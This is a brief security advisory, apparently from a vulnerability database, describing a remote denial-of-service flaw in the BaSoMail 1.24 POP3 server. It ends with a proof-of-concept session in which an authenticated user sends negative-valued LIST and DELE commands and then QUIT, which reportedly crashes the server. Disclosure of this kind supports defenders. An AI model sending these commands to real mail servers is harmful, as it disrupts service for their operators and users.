BaSoMail 1.24 POP3 Server Denial of Service Vulnerability

2014-07-01T00:00:00
ID SSV:76466
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/7724/info

BaSoMail POP3 server has been reported prone to a remote denial of service vulnerability.

It has been reported that a remote authenticated attacker, may supply negative value integers to several POP3 commands successively. If the attacker then invokes the QUIT command the BaSoMail server will reportedly fail, possibly due to an internal exception. 

+OK Welcome to BaSoMail (www.BaSo.no)
user XXXX
+OK
pass XXXX
+OK Access granted
list -0
dele -0000
quit